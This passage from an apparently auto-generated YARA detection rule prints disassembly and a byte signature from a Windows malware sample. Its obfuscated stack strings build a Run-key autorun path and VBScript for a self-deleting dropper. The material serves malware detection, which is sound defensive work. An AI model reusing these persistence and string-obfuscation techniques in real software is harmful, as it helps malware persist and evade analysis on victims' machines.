.text:0x004056f5 b35c mov bl,92 + .text:0x004056f7 b272 mov dl,114 + .text:0x004056f9 884c2415 mov byte [esp + 21],cl + .text:0x004056fd 884c2417 mov byte [esp + 23],cl + .text:0x00405701 b06e mov al,110 + .text:0x00405703 884c241f mov byte [esp + 31],cl + .text:0x00405707 884c242f mov byte [esp + 47],cl + .text:0x0040570b 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00405711 6a00 push 0 + .text:0x00405713 56 push esi + .text:0x00405714 c644241053 mov byte [esp + 16],83 + .text:0x00405719 c64424114f mov byte [esp + 17],79 + .text:0x0040571e c644241246 mov byte [esp + 18],70 + .text:0x00405723 c644241354 mov byte [esp + 19],84 + .text:0x00405728 c644241541 mov byte [esp + 21],65 + .text:0x0040572d c644241652 mov byte [esp + 22],82 + .text:0x00405732 c644241745 mov byte [esp + 23],69 + .text:0x00405737 885c2418 mov byte [esp + 24],bl + .text:0x0040573b c64424194d mov byte [esp + 25],77 + .text:0x00405740 c644241a69 mov byte [esp + 26],105 + .text:0x00405745 c644241b63 mov byte [esp + 27],99 + .text:0x0040574a 8854241c mov byte [esp + 28],dl + .text:0x0040574e c644241e73 mov byte [esp + 30],115 + .text:0x00405753 c644242066 mov byte [esp + 32],102 + .text:0x00405758 c644242174 mov byte [esp + 33],116 + .text:0x0040575d 885c2422 mov byte [esp + 34],bl + .text:0x00405761 c644242469 mov byte [esp + 36],105 + .text:0x00405766 88442425 mov byte [esp + 37],al + .text:0x0040576a c644242664 mov byte [esp + 38],100 + .text:0x0040576f c644242877 mov byte [esp + 40],119 + .text:0x00405774 c644242973 mov byte [esp + 41],115 + .text:0x00405779 885c242a mov byte [esp + 42],bl + .text:0x0040577d c644242b43 mov byte [esp + 43],67 + .text:0x00405782 c644242c75 mov byte [esp + 44],117 + .text:0x00405787 8854242d mov byte [esp + 45],dl + .text:0x0040578b 8854242e mov byte [esp + 46],dl + .text:0x0040578f c644242f65 mov byte [esp + 47],101 + .text:0x00405794 88442430 mov byte [esp + 48],al + .text:0x00405798 c644243174 mov byte [esp + 49],116 + .text:0x0040579d c644243256 mov byte [esp + 50],86 + .text:0x004057a2 c644243365 mov byte [esp + 51],101 + .text:0x004057a7 88542434 mov byte [esp + 52],dl + .text:0x004057ab c644243573 mov byte [esp + 53],115 + .text:0x004057b0 c644243669 mov byte [esp + 54],105 + .text:0x004057b5 88442438 mov byte [esp + 56],al + .text:0x004057b9 885c2439 mov byte [esp + 57],bl + .text:0x004057bd c644243a52 mov byte [esp + 58],82 + .text:0x004057c2 c644243b75 mov byte [esp + 59],117 + .text:0x004057c7 8844243c mov byte [esp + 60],al + .text:0x004057cb c644243d00 mov byte [esp + 61],0 + .text:0x004057d0 e81befffff call 0x004046f0 ;sub_004046f0(arg1) + .text:0x004057d5 50 push eax + .text:0x004057d6 56 push esi + .text:0x004057d7 6a01 push 1 + .text:0x004057d9 8d442418 lea eax,dword [esp + 24] + .text:0x004057dd 68f6a44000 push 0x0040a4f6 + .text:0x004057e2 50 push eax + .text:0x004057e3 6802000080 push 0x80000002 + .text:0x004057e8 e8f3f3ffff call 0x00404be0 ;sub_00404be0(0x80000002,local48,0x0040a4f6,1,arg1,sub_004046f0(arg1),0) + .text:0x004057ed 83c41c add esp,28 + .text:0x004057f0 33c0 xor eax,eax + .text:0x004057f2 5e pop esi + .text:0x004057f3 5b pop ebx + .text:0x004057f4 83c430 add esp,48 + .text:0x004057f7 c3 ret + */ + $c5 = { 83 EC 30 53 B0 57 56 8B 74 24 ?? B1 6F 88 44 24 ?? 88 44 24 ?? B3 5C B2 72 88 4C 24 ?? 88 4C 24 ?? B0 6E 88 4C 24 ?? 88 4C 24 ?? 8B 0D ?? ?? ?? ?? 6A 00 56 C6 44 24 ?? 53 C6 44 24 ?? 4F C6 44 24 ?? 46 C6 44 24 ?? 54 C6 44 24 ?? 41 C6 44 24 ?? 52 C6 44 24 ?? 45 88 5C 24 ?? C6 44 24 ?? 4D C6 44 24 ?? 69 C6 44 24 ?? 63 88 54 24 ?? C6 44 24 ?? 73 C6 44 24 ?? 66 C6 44 24 ?? 74 88 5C 24 ?? C6 44 24 ?? 69 88 44 24 ?? C6 44 24 ?? 64 C6 44 24 ?? 77 C6 44 24 ?? 73 88 5C 24 ?? C6 44 24 ?? 43 C6 44 24 ?? 75 88 54 24 ?? 88 54 24 ?? C6 44 24 ?? 65 88 44 24 ?? C6 44 24 ?? 74 C6 44 24 ?? 56 C6 44 24 ?? 65 88 54 24 ?? C6 44 24 ?? 73 C6 44 24 ?? 69 88 44 24 ?? 88 5C 24 ?? C6 44 24 ?? 52 C6 44 24 ?? 75 88 44 24 ?? C6 44 24 ?? 00 E8 ?? ?? ?? ?? 50 56 6A 01 8D 44 24 ?? 68 F6 A4 40 00 50 68 02 00 00 80 E8 ?? ?? ?? ?? 83 C4 1C 33 C0 5E 5B 83 C4 30 C3 } + /* +Basic Block at 0x00405920@9324d1a8ae37a36ae560c37448c9705a with 2 features: + - contain obfuscated stackstrings + - create process on Windows + .text:0x00405920 + .text:0x00405920 FUNC: int cdecl sub_00405920( ) [6 XREFS] + .text:0x00405920 + .text:0x00405920 Stack Variables: (offset from initial top of stack) + .text:0x00405920 -499: int local499 + .text:0x00405920 -500: int local500 + .text:0x00405920 -753: int local753 + .text:0x00405920 -755: int local755 + .text:0x00405920 -756: int local756 + .text:0x00405920 -855: int local855 + .text:0x00405920 -856: int local856 + .text:0x00405920 -860: int local860 + .text:0x00405920 -864: int local864 + .text:0x00405920 -865: int local865 + .text:0x00405920 -866: int local866 + .text:0x00405920 -867: int local867 + .text:0x00405920 -868: int local868 + .text:0x00405920 -869: int local869 + .text:0x00405920 -870: int local870 + .text:0x00405920 -871: int local871 + .text:0x00405920 -872: int local872 + .text:0x00405920 -873: int local873 + .text:0x00405920 -874: int local874 + .text:0x00405920 -875: int local875 + .text:0x00405920 -876: int local876 + .text:0x00405920 -877: int local877 + .text:0x00405920 -878: int local878 + .text:0x00405920 -879: int local879 + .text:0x00405920 -880: int local880 + .text:0x00405920 -881: int local881 + .text:0x00405920 -882: int local882 + .text:0x00405920 -883: int local883 + .text:0x00405920 -884: int local884 + .text:0x00405920 -885: int local885 + .text:0x00405920 -886: int local886 + .text:0x00405920 -887: int local887 + .text:0x00405920 -888: int local888 + .text:0x00405920 -889: int local889 + .text:0x00405920 -890: int local890 + .text:0x00405920 -891: int local891 + .text:0x00405920 -892: int local892 + .text:0x00405920 -893: int local893 + .text:0x00405920 -894: int local894 + .text:0x00405920 -895: int local895 + .text:0x00405920 -896: int local896 + .text:0x00405920 -897: int local897 + .text:0x00405920 -898: int local898 + .text:0x00405920 -899: int local899 + .text:0x00405920 -900: int local900 + .text:0x00405920 -901: int local901 + .text:0x00405920 -902: int local902 + .text:0x00405920 -903: int local903 + .text:0x00405920 -904: int local904 + .text:0x00405920 -905: int local905 + .text:0x00405920 -906: int local906 + .text:0x00405920 -907: int local907 + .text:0x00405920 -908: int local908 + .text:0x00405920 -909: int local909 + .text:0x00405920 -910: int local910 + .text:0x00405920 -911: int local911 + .text:0x00405920 -912: int local912 + .text:0x00405920 -913: int local913 + .text:0x00405920 -914: int local914 + .text:0x00405920 -915: int local915 + .text:0x00405920 -916: int local916 + .text:0x00405920 -917: int local917 + .text:0x00405920 -918: int local918 + .text:0x00405920 -919: int local919 + .text:0x00405920 -920: int local920 + .text:0x00405920 -921: int local921 + .text:0x00405920 -922: int local922 + .text:0x00405920 -923: int local923 + .text:0x00405920 -924: int local924 + .text:0x00405920 -925: int local925 + .text:0x00405920 -926: int local926 + .text:0x00405920 -927: int local927 + .text:0x00405920 -928: int local928 + .text:0x00405920 -929: int local929 + .text:0x00405920 -930: int local930 + .text:0x00405920 -931: int local931 + .text:0x00405920 -932: int local932 + .text:0x00405920 -933: int local933 + .text:0x00405920 -934: int local934 + .text:0x00405920 -935: int local935 + .text:0x00405920 -936: int local936 + .text:0x00405920 -937: int local937 + .text:0x00405920 -938: int local938 + .text:0x00405920 -939: int local939 + .text:0x00405920 -940: int local940 + .text:0x00405920 -941: int local941 + .text:0x00405920 -942: int local942 + .text:0x00405920 -943: int local943 + .text:0x00405920 -944: int local944 + .text:0x00405920 -945: int local945 + .text:0x00405920 -946: int local946 + .text:0x00405920 -947: int local947 + .text:0x00405920 -948: int local948 + .text:0x00405920 -949: int local949 + .text:0x00405920 -950: int local950 + .text:0x00405920 -951: int local951 + .text:0x00405920 -952: int local952 + .text:0x00405920 -953: int local953 + .text:0x00405920 -954: int local954 + .text:0x00405920 -955: int local955 + .text:0x00405920 -956: int local956 + .text:0x00405920 -957: int local957 + .text:0x00405920 -958: int local958 + .text:0x00405920 -959: int local959 + .text:0x00405920 -960: int local960 + .text:0x00405920 -961: int local961 + .text:0x00405920 -962: int local962 + .text:0x00405920 -963: int local963 + .text:0x00405920 -964: int local964 + .text:0x00405920 -965: int local965 + .text:0x00405920 -966: int local966 + .text:0x00405920 -967: int local967 + .text:0x00405920 -968: int local968 + .text:0x00405920 -969: int local969 + .text:0x00405920 -970: int local970 + .text:0x00405920 -971: int local971 + .text:0x00405920 -972: int local972 + .text:0x00405920 -973: int local973 + .text:0x00405920 -974: int local974 + .text:0x00405920 -975: int local975 + .text:0x00405920 -976: int local976 + .text:0x00405920 -977: int local977 + .text:0x00405920 -978: int local978 + .text:0x00405920 -979: int local979 + .text:0x00405920 -980: int local980 + .text:0x00405920 -981: int local981 + .text:0x00405920 -982: int local982 + .text:0x00405920 -983: int local983 + .text:0x00405920 -984: int local984 + .text:0x00405920 -985: int local985 + .text:0x00405920 -986: int local986 + .text:0x00405920 -987: int local987 + .text:0x00405920 -988: int local988 + .text:0x00405920 -989: int local989 + .text:0x00405920 -990: int local990 + .text:0x00405920 -991: int local991 + .text:0x00405920 -992: int local992 + .text:0x00405920 -993: int local993 + .text:0x00405920 -994: int local994 + .text:0x00405920 -995: int local995 + .text:0x00405920 -996: int local996 + .text:0x00405920 -999: int local999 + .text:0x00405920 -1000: int local1000 + .text:0x00405920 -1001: int local1001 + .text:0x00405920 -1002: int local1002 + .text:0x00405920 -1003: int local1003 + .text:0x00405920 -1004: int local1004 + .text:0x00405920 -1005: int local1005 + .text:0x00405920 -1006: int local1006 + .text:0x00405920 -1007: int local1007 + .text:0x00405920 -1008: int local1008 + .text:0x00405920 -1009: int local1009 + .text:0x00405920 -1010: int local1010 + .text:0x00405920 -1011: int local1011 + .text:0x00405920 -1012: int local1012 + .text:0x00405920 -1013: int local1013 + .text:0x00405920 -1014: int local1014 + .text:0x00405920 -1015: int local1015 + .text:0x00405920 -1016: int local1016 + .text:0x00405920 -1017: int local1017 + .text:0x00405920 -1018: int local1018 + .text:0x00405920 -1019: int local1019 + .text:0x00405920 -1020: int local1020 + .text:0x00405920 -1021: int local1021 + .text:0x00405920 -1022: int local1022 + .text:0x00405920 -1023: int local1023 + .text:0x00405920 -1024: int local1024 + .text:0x00405920 -1025: int local1025 + .text:0x00405920 -1026: int local1026 + .text:0x00405920 -1027: int local1027 + .text:0x00405920 -1028: int local1028 + .text:0x00405920 -1029: int local1029 + .text:0x00405920 -1030: int local1030 + .text:0x00405920 -1031: int local1031 + .text:0x00405920 -1032: int local1032 + .text:0x00405920 -1033: int local1033 + .text:0x00405920 -1034: int local1034 + .text:0x00405920 -1035: int local1035 + .text:0x00405920 -1036: int local1036 + .text:0x00405920 -1038: int local1038 + .text:0x00405920 -1039: int local1039 + .text:0x00405920 -1040: int local1040 + .text:0x00405920 -1041: int local1041 + .text:0x00405920 -1042: int local1042 + .text:0x00405920 -1043: int local1043 + .text:0x00405920 -1044: int local1044 + .text:0x00405920 -1045: int local1045 + .text:0x00405920 -1046: int local1046 + .text:0x00405920 -1047: int local1047 + .text:0x00405920 -1048: int local1048 + .text:0x00405920 -1049: int local1049 + .text:0x00405920 -1050: int local1050 + .text:0x00405920 -1051: int local1051 + .text:0x00405920 -1052: int local1052 + .text:0x00405920 -1053: int local1053 + .text:0x00405920 -1054: int local1054 + .text:0x00405920 -1055: int local1055 + .text:0x00405920 -1056: int local1056 + .text:0x00405920 -1057: int local1057 + .text:0x00405920 -1058: int local1058 + .text:0x00405920 -1059: int local1059 + .text:0x00405920 -1060: int local1060 + .text:0x00405920 -1061: int local1061 + .text:0x00405920 -1062: int local1062 + .text:0x00405920 -1063: int local1063 + .text:0x00405920 -1064: int local1064 + .text:0x00405920 -1065: int local1065 + .text:0x00405920 -1066: int local1066 + .text:0x00405920 -1067: int local1067 + .text:0x00405920 -1068: int local1068 + .text:0x00405920 -1072: int local1072 + .text:0x00405920 -1073: int local1073 + .text:0x00405920 -1074: int local1074 + .text:0x00405920 -1075: int local1075 + .text:0x00405920 -1076: int local1076 + .text:0x00405920 -1077: int local1077 + .text:0x00405920 -1078: int local1078 + .text:0x00405920 -1079: int local1079 + .text:0x00405920 -1080: int local1080 + .text:0x00405920 -1081: int local1081 + .text:0x00405920 -1082: int local1082 + .text:0x00405920 -1083: int local1083 + .text:0x00405920 -1084: int local1084 + .text:0x00405920 -1085: int local1085 + .text:0x00405920 -1086: int local1086 + .text:0x00405920 -1087: int local1087 + .text:0x00405920 -1088: int local1088 + .text:0x00405920 -1089: int local1089 + .text:0x00405920 -1090: int local1090 + .text:0x00405920 -1091: int local1091 + .text:0x00405920 -1092: int local1092 + .text:0x00405920 -1093: int local1093 + .text:0x00405920 -1094: int local1094 + .text:0x00405920 -1095: int local1095 + .text:0x00405920 -1096: int local1096 + .text:0x00405920 -1097: int local1097 + .text:0x00405920 -1098: int local1098 + .text:0x00405920 -1099: int local1099 + .text:0x00405920 -1100: int local1100 + .text:0x00405920 -1101: int local1101 + .text:0x00405920 -1102: int local1102 + .text:0x00405920 -1103: int local1103 + .text:0x00405920 -1104: int local1104 + .text:0x00405920 -1105: int local1105 + .text:0x00405920 -1106: int local1106 + .text:0x00405920 -1107: int local1107 + .text:0x00405920 -1108: int local1108 + .text:0x00405920 -1109: int local1109 + .text:0x00405920 -1110: int local1110 + .text:0x00405920 -1111: int local1111 + .text:0x00405920 -1112: int local1112 + .text:0x00405920 -1114: int local1114 + .text:0x00405920 -1115: int local1115 + .text:0x00405920 -1116: int local1116 + .text:0x00405920 -1117: int local1117 + .text:0x00405920 -1118: int local1118 + .text:0x00405920 -1119: int local1119 + .text:0x00405920 -1120: int local1120 + .text:0x00405920 -1121: int local1121 + .text:0x00405920 -1122: int local1122 + .text:0x00405920 -1123: int local1123 + .text:0x00405920 -1124: int local1124 + .text:0x00405920 -1125: int local1125 + .text:0x00405920 -1126: int local1126 + .text:0x00405920 -1127: int local1127 + .text:0x00405920 -1128: int local1128 + .text:0x00405920 -1129: int local1129 + .text:0x00405920 -1130: int local1130 + .text:0x00405920 -1131: int local1131 + .text:0x00405920 -1132: int local1132 + .text:0x00405920 -1136: int local1136 + .text:0x00405920 -1137: int local1137 + .text:0x00405920 -1138: int local1138 + .text:0x00405920 -1139: int local1139 + .text:0x00405920 -1140: int local1140 + .text:0x00405920 -1141: int local1141 + .text:0x00405920 -1142: int local1142 + .text:0x00405920 -1143: int local1143 + .text:0x00405920 -1144: int local1144 + .text:0x00405920 -1148: int local1148 + .text:0x00405920 -1149: int local1149 + .text:0x00405920 -1150: int local1150 + .text:0x00405920 -1151: int local1151 + .text:0x00405920 -1152: int local1152 + .text:0x00405920 -1153: int local1153 + .text:0x00405920 -1154: int local1154 + .text:0x00405920 -1155: int local1155 + .text:0x00405920 -1156: int local1156 + .text:0x00405920 -1157: int local1157 + .text:0x00405920 -1158: int local1158 + .text:0x00405920 -1159: int local1159 + .text:0x00405920 -1160: int local1160 + .text:0x00405920 -1161: int local1161 + .text:0x00405920 -1162: int local1162 + .text:0x00405920 -1163: int local1163 + .text:0x00405920 -1164: int local1164 + .text:0x00405920 -1168: int local1168 + .text:0x00405920 -1169: int local1169 + .text:0x00405920 -1170: int local1170 + .text:0x00405920 -1171: int local1171 + .text:0x00405920 -1172: int local1172 + .text:0x00405920 -1436: int local1436 + .text:0x00405920 -1437: int local1437 + .text:0x00405920 -1438: int local1438 + .text:0x00405920 -1439: int local1439 + .text:0x00405920 -1440: int local1440 + .text:0x00405920 -1441: int local1441 + .text:0x00405920 -1442: int local1442 + .text:0x00405920 -1443: int local1443 + .text:0x00405920 -1444: int local1444 + .text:0x00405920 -1445: int local1445 + .text:0x00405920 -1446: int local1446 + .text:0x00405920 -1447: int local1447 + .text:0x00405920 -1448: int local1448 + .text:0x00405920 -1449: int local1449 + .text:0x00405920 -1450: int local1450 + .text:0x00405920 -1451: int local1451 + .text:0x00405920 -1452: int local1452 + .text:0x00405920 -1453: int local1453 + .text:0x00405920 -1454: int local1454 + .text:0x00405920 -1455: int local1455 + .text:0x00405920 -1456: int local1456 + .text:0x00405920 -1460: int local1460 + .text:0x00405920 -1461: int local1461 + .text:0x00405920 -1462: int local1462 + .text:0x00405920 -1463: int local1463 + .text:0x00405920 -1464: int local1464 + .text:0x00405920 -1465: int local1465 + .text:0x00405920 -1466: int local1466 + .text:0x00405920 -1467: int local1467 + .text:0x00405920 -1468: int local1468 + .text:0x00405920 -1469: int local1469 + .text:0x00405920 -1470: int local1470 + .text:0x00405920 -1471: int local1471 + .text:0x00405920 -1472: int local1472 + .text:0x00405920 -1473: int local1473 + .text:0x00405920 -1474: int local1474 + .text:0x00405920 -1475: int local1475 + .text:0x00405920 -1476: int local1476 + .text:0x00405920 -1477: int local1477 + .text:0x00405920 -1478: int local1478 + .text:0x00405920 -1479: int local1479 + .text:0x00405920 -1480: int local1480 + .text:0x00405920 -1481: int local1481 + .text:0x00405920 -1482: int local1482 + .text:0x00405920 -1483: int local1483 + .text:0x00405920 -1484: int local1484 + .text:0x00405920 + .text:0x00405920 81ec94040000 sub esp,1172 + .text:0x00405926 53 push ebx + .text:0x00405927 56 push esi + .text:0x00405928 57 push edi + .text:0x00405929 b918000000 mov ecx,24 + .text:0x0040592e 33c0 xor eax,eax + .text:0x00405930 8dbc2449010000 lea edi,dword [esp + 329] + .text:0x00405937 c684244801000000 mov byte [esp + 328],0 + .text:0x0040593f c68424ac02000000 mov byte [esp + 684],0 + .text:0x00405947 f3ab rep: stosd + .text:0x00405949 66ab stosd + .text:0x0040594b aa stosb + .text:0x0040594c b97c000000 mov ecx,124 + .text:0x00405951 33c0 xor eax,eax + .text:0x00405953 8dbc24ad020000 lea edi,dword [esp + 685] + .text:0x0040595a c68424ac01000000 mov byte [esp + 428],0 + .text:0x00405962 f3ab rep: stosd + .text:0x00405964 66ab stosd + .text:0x00405966 aa stosb + .text:0x00405967 b93f000000 mov ecx,63 + .text:0x0040596c 33c0 xor eax,eax + .text:0x0040596e 8dbc24ad010000 lea edi,dword [esp + 429] + .text:0x00405975 b272 mov dl,114 + .text:0x00405977 f3ab rep: stosd + .text:0x00405979 66ab stosd + .text:0x0040597b aa stosb + .text:0x0040597c b365 mov bl,101 + .text:0x0040597e b074 mov al,116 + .text:0x00405980 b163 mov cl,99 + .text:0x00405982 c644241464 mov byte [esp + 20],100 + .text:0x00405987 c644241569 mov byte [esp + 21],105 + .text:0x0040598c c64424166d mov byte [esp + 22],109 + .text:0x00405991 c644241720 mov byte [esp + 23],32 + .text:0x00405996 c644241877 mov byte [esp + 24],119 + .text:0x0040599b c644241973 mov byte [esp + 25],115 + .text:0x004059a0 c644241a68 mov byte [esp + 26],104 + .text:0x004059a5 c644241b00 mov byte [esp + 27],0 + .text:0x004059aa c644245c4f mov byte [esp + 92],79 + .text:0x004059af c644245d6e mov byte [esp + 93],110 + .text:0x004059b4 c644245e20 mov byte [esp + 94],32 + .text:0x004059b9 c644245f45 mov byte [esp + 95],69 + .text:0x004059be 88542460 mov byte [esp + 96],dl + .text:0x004059c2 88542461 mov byte [esp + 97],dl + .text:0x004059c6 c64424626f mov byte [esp + 98],111 + .text:0x004059cb 88542463 mov byte [esp + 99],dl + .text:0x004059cf c644246420 mov byte [esp + 100],32 + .text:0x004059d4 c644246552 mov byte [esp + 101],82 + .text:0x004059d9 885c2466 mov byte [esp + 102],bl + .text:0x004059dd c644246773 mov byte [esp + 103],115 + .text:0x004059e2 c644246875 mov byte [esp + 104],117 + .text:0x004059e7 c64424696d mov byte [esp + 105],109 + .text:0x004059ec 885c246a mov byte [esp + 106],bl + .text:0x004059f0 c644246b20 mov byte [esp + 107],32 + .text:0x004059f5 c644246c4e mov byte [esp + 108],78 + .text:0x004059fa 885c246d mov byte [esp + 109],bl + .text:0x004059fe c644246e78 mov byte [esp + 110],120 + .text:0x00405a03 8844246f mov byte [esp + 111],al + .text:0x00405a07 c644247000 mov byte [esp + 112],0 + .text:0x00405a0c c684249400000073 mov byte [esp + 148],115 + .text:0x00405a14 889c2495000000 mov byte [esp + 149],bl + .text:0x00405a1b 88842496000000 mov byte [esp + 150],al + .text:0x00405a22 c684249700000020 mov byte [esp + 151],32 + .text:0x00405a2a c684249800000077 mov byte [esp + 152],119 + .text:0x00405a32 c684249900000073 mov byte [esp + 153],115 + .text:0x00405a3a c684249a00000068 mov byte [esp + 154],104 + .text:0x00405a42 c684249b0000003d mov byte [esp + 155],61 + .text:0x00405a4a 888c249c000000 mov byte [esp + 156],cl + .text:0x00405a51 8894249d000000 mov byte [esp + 157],dl + .text:0x00405a58 889c249e000000 mov byte [esp + 158],bl + .text:0x00405a5f c684249f00000061 mov byte [esp + 159],97 + .text:0x00405a67 888424a0000000 mov byte [esp + 160],al + .text:0x00405a6e 889c24a1000000 mov byte [esp + 161],bl + .text:0x00405a75 c68424a20000004f mov byte [esp + 162],79 + .text:0x00405a7d c68424a300000062 mov byte [esp + 163],98 + .text:0x00405a85 c68424a40000006a mov byte [esp + 164],106 + .text:0x00405a8d 889c24a5000000 mov byte [esp + 165],bl + .text:0x00405a94 888c24a6000000 mov byte [esp + 166],cl + .text:0x00405a9b 888424a7000000 mov byte [esp + 167],al + .text:0x00405aa2 c68424a800000028 mov byte [esp + 168],40 + .text:0x00405aaa c68424a900000022 mov byte [esp + 169],34 + .text:0x00405ab2 c68424aa00000057 mov byte [esp + 170],87 + .text:0x00405aba c68424ab00000053 mov byte [esp + 171],83 + .text:0x00405ac2 888c24ac000000 mov byte [esp + 172],cl + .text:0x00405ac9 889424ad000000 mov byte [esp + 173],dl + .text:0x00405ad0 c68424ae00000069 mov byte [esp + 174],105 + .text:0x00405ad8 c68424af00000070 mov byte [esp + 175],112 + .text:0x00405ae0 888424b0000000 mov byte [esp + 176],al + .text:0x00405ae7 c68424b10000002e mov byte [esp + 177],46 + .text:0x00405aef c68424b200000053 mov byte [esp + 178],83 + .text:0x00405af7 c68424b300000068 mov byte [esp + 179],104 + .text:0x00405aff 889c24b4000000 mov byte [esp + 180],bl + .text:0x00405b06 c68424b50000006c mov byte [esp + 181],108 + .text:0x00405b0e c68424b60000006c mov byte [esp + 182],108 + .text:0x00405b16 c68424b700000022 mov byte [esp + 183],34 + .text:0x00405b1e c68424b800000029 mov byte [esp + 184],41 + .text:0x00405b26 c68424b900000000 mov byte [esp + 185],0 + .text:0x00405b2e c68424bc00000053 mov byte [esp + 188],83 + .text:0x00405b36 889c24bd000000 mov byte [esp + 189],bl + .text:0x00405b3d 888424be000000 mov byte [esp + 190],al + .text:0x00405b44 c68424bf00000020 mov byte [esp + 191],32 + .text:0x00405b4c c68424c00000006f mov byte [esp + 192],111 + .text:0x00405b54 c68424c100000062 mov byte [esp + 193],98 + .text:0x00405b5c c68424c20000006a mov byte [esp + 194],106 + .text:0x00405b64 c68424c300000046 mov byte [esp + 195],70 + .text:0x00405b6c c68424c400000053 mov byte [esp + 196],83 + .text:0x00405b74 c68424c50000004f mov byte [esp + 197],79 + .text:0x00405b7c c68424c600000020 mov byte [esp + 198],32 + .text:0x00405b84 c68424c70000003d mov byte [esp + 199],61 + .text:0x00405b8c c68424c800000020 mov byte [esp + 200],32 + .text:0x00405b94 c68424c900000043 mov byte [esp + 201],67 + .text:0x00405b9c 889424ca000000 mov byte [esp + 202],dl + .text:0x00405ba3 889c24cb000000 mov byte [esp + 203],bl + .text:0x00405baa c68424cc00000061 mov byte [esp + 204],97 + .text:0x00405bb2 888424cd000000 mov byte [esp + 205],al + .text:0x00405bb9 889c24ce000000 mov byte [esp + 206],bl + .text:0x00405bc0 c68424cf0000004f mov byte [esp + 207],79 + .text:0x00405bc8 c68424d000000062 mov byte [esp + 208],98 + .text:0x00405bd0 c68424d10000006a mov byte [esp + 209],106 + .text:0x00405bd8 889c24d2000000 mov byte [esp + 210],bl + .text:0x00405bdf 888c24d3000000 mov byte [esp + 211],cl + .text:0x00405be6 888424d4000000 mov byte [esp + 212],al + .text:0x00405bed c68424d500000028 mov byte [esp + 213],40 + .text:0x00405bf5 c68424d600000022 mov byte [esp + 214],34 + .text:0x00405bfd c68424d700000053 mov byte [esp + 215],83 + .text:0x00405c05 888c24d8000000 mov byte [esp + 216],cl + .text:0x00405c0c 889424d9000000 mov byte [esp + 217],dl + .text:0x00405c13 c68424da00000069 mov byte [esp + 218],105 + .text:0x00405c1b c68424db00000070 mov byte [esp + 219],112 + .text:0x00405c23 888424dc000000 mov byte [esp + 220],al + .text:0x00405c2a c68424dd00000069 mov byte [esp + 221],105 + .text:0x00405c32 c68424de0000006e mov byte [esp + 222],110 + .text:0x00405c3a c68424df00000067 mov byte [esp + 223],103 + .text:0x00405c42 c68424e00000002e mov byte [esp + 224],46 + .text:0x00405c4a c68424e100000046 mov byte [esp + 225],70 + .text:0x00405c52 c68424e200000069 mov byte [esp + 226],105 + .text:0x00405c5a c68424e30000006c mov byte [esp + 227],108 + .text:0x00405c62 889c24e4000000 mov byte [esp + 228],bl + .text:0x00405c69 c68424e500000053 mov byte [esp + 229],83 + .text:0x00405c71 c68424e600000079 mov byte [esp + 230],121 + .text:0x00405c79 c68424e700000073 mov byte [esp + 231],115 + .text:0x00405c81 888424e8000000 mov byte [esp + 232],al + .text:0x00405c88 889c24e9000000 mov byte [esp + 233],bl + .text:0x00405c8f c68424ea0000006d mov byte [esp + 234],109 + .text:0x00405c97 c68424eb0000004f mov byte [esp + 235],79 + .text:0x00405c9f c68424ec00000062 mov byte [esp + 236],98 + .text:0x00405ca7 c68424ed0000006a mov byte [esp + 237],106 + .text:0x00405caf 889c24ee000000 mov byte [esp + 238],bl + .text:0x00405cb6 888c24ef000000 mov byte [esp + 239],cl + .text:0x00405cbd 888424f0000000 mov byte [esp + 240],al + .text:0x00405cc4 c68424f100000022 mov byte [esp + 241],34 + .text:0x00405ccc c68424f200000029 mov byte [esp + 242],41 + .text:0x00405cd4 c68424f300000000 mov byte [esp + 243],0 + .text:0x00405cdc c644243477 mov byte [esp + 52],119 + .text:0x00405ce1 c644243573 mov byte [esp + 53],115 + .text:0x00405ce6 884c2436 mov byte [esp + 54],cl + .text:0x00405cea 88542437 mov byte [esp + 55],dl + .text:0x00405cee c644243869 mov byte [esp + 56],105 + .text:0x00405cf3 c644243970 mov byte [esp + 57],112 + .text:0x00405cf8 8844243a mov byte [esp + 58],al + .text:0x00405cfc c644243b2e mov byte [esp + 59],46 + .text:0x00405d01 c644243c73 mov byte [esp + 60],115 + .text:0x00405d06 c644243d6c mov byte [esp + 61],108 + .text:0x00405d0b 885c243e mov byte [esp + 62],bl + .text:0x00405d0f 885c243f mov byte [esp + 63],bl + .text:0x00405d13 c644244070 mov byte [esp + 64],112 + .text:0x00405d18 c644244120 mov byte [esp + 65],32 + .text:0x00405d1d c644244231 mov byte [esp + 66],49 + .text:0x00405d22 c644244330 mov byte [esp + 67],48 + .text:0x00405d27 c644244430 mov byte [esp + 68],48 + .text:0x00405d2c c644244530 mov byte [esp + 69],48 + .text:0x00405d31 c644244600 mov byte [esp + 70],0 + .text:0x00405d36 c64424486f mov byte [esp + 72],111 + .text:0x00405d3b c644244962 mov byte [esp + 73],98 + .text:0x00405d40 c644244a6a mov byte [esp + 74],106 + .text:0x00405d45 c644244b46 mov byte [esp + 75],70 + .text:0x00405d4a c644244c53 mov byte [esp + 76],83 + .text:0x00405d4f c644244d4f mov byte [esp + 77],79 + .text:0x00405d54 c644244e2e mov byte [esp + 78],46 + .text:0x00405d59 c644244f44 mov byte [esp + 79],68 + .text:0x00405d5e 885c2450 mov byte [esp + 80],bl + .text:0x00405d62 c64424516c mov byte [esp + 81],108 + .text:0x00405d67 885c2452 mov byte [esp + 82],bl + .text:0x00405d6b 88442453 mov byte [esp + 83],al + .text:0x00405d6f 885c2454 mov byte [esp + 84],bl + .text:0x00405d73 c644245546 mov byte [esp + 85],70 + .text:0x00405d78 c644245669 mov byte [esp + 86],105 + .text:0x00405d7d c64424576c mov byte [esp + 87],108 + .text:0x00405d82 885c2458 mov byte [esp + 88],bl + .text:0x00405d86 c644245928 mov byte [esp + 89],40 + .text:0x00405d8b c644245a22 mov byte [esp + 90],34 + .text:0x00405d90 c644245b00 mov byte [esp + 91],0 + .text:0x00405d95 c644241c22 mov byte [esp + 28],34 + .text:0x00405d9a c644241d29 mov byte [esp + 29],41 + .text:0x00405d9f c644241e2c mov byte [esp + 30],44 + .text:0x00405da4 c644241f20 mov byte [esp + 31],32 + .text:0x00405da9 c644242054 mov byte [esp + 32],84 + .text:0x00405dae 88542421 mov byte [esp + 33],dl + .text:0x00405db2 c644242275 mov byte [esp + 34],117 + .text:0x00405db7 885c2423 mov byte [esp + 35],bl + .text:0x00405dbb c644242400 mov byte [esp + 36],0 + .text:0x00405dc0 888c24f4000000 mov byte [esp + 244],cl + .text:0x00405dc7 889424f5000000 mov byte [esp + 245],dl + .text:0x00405dce 889c24f6000000 mov byte [esp + 246],bl + .text:0x00405dd5 c68424f700000061 mov byte [esp + 247],97 + .text:0x00405ddd 888424f8000000 mov byte [esp + 248],al + 